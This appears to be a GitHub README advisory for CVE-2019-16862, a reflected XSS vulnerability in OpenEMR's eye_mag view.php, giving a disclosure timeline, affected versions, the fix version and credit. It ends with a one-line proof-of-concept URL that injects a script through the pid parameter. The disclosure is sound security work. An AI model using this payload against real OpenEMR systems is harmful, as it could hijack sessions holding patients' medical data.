Skip to content

Latest commit

 

History

History
36 lines (30 loc) · 979 Bytes

README.md

File metadata and controls

36 lines (30 loc) · 979 Bytes
Raw

CVE-2019-16862

Reflected XSS in interface/forms/eye_mag/view.php in OpenEMR 5.x before 5.0.2.1 allows a remote attacker to execute arbitrary code in the context of a user's session via the pid parameter.

Timeline

  • Discovered: September 24, 2019
  • Pull Request Issued: September 24, 2019
  • Reported: September 24, 2019
  • OpenEMR merged pull Request: September 24, 2019
  • CVE ID issued: October 24, 2019
  • OpenEMR Release: October 10, 2019 (5.0.2.1)

Version Details

Fixed-In Version: 5.0.2.1

Affected Versions:

  • 5.0.1
  • 5.0.1.1
  • 5.0.1.2
  • 5.0.1.3
  • 5.0.1.4
  • 5.0.1.5
  • 5.0.1.6
  • 5.0.1.7
  • 5.0.2

Credit

Will Porter, Lodestone Security (https://www.lodestonesecurity.com/)

References

Pull Request

POC Exploit

Assuming OpenEMR is running on localhost

http://localhost/openemr/interface/forms/eye_mag/view.php?pid="><script>alert(%27pid%20xss%27);</script><"&id=1